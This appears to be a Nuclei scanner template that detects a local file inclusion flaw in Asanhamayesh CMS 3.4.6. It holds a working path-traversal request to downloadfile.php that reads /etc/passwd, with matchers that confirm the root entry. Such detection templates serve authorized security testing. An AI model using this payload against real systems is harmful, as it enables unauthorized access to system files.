id: asanhamayesh-lfi

info:
  name: Asanhamayesh CMS 3.4.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Asanhamayesh CMS 3.4.6 is vulnerable to local file inclusion.
  reference:
    - https://cxsecurity.com/issue/WLB-2018030006
    - https://asanhamayesh.com
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: asanhamayesh,lfi,traversal

http:
  - method: GET
    path:
      - "{{BaseURL}}/downloadfile.php?file=../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 490a0046304402203b7cd76cb31a7587435ae852e0a7f2443e8fd0d9bb18972ea0c2b47d327fb6bf022043476e7b09fb9818110ae5712a3cce74952a97008e4644f9bb496411201a67bf:922c64590222798bb761d5b6d8e72950
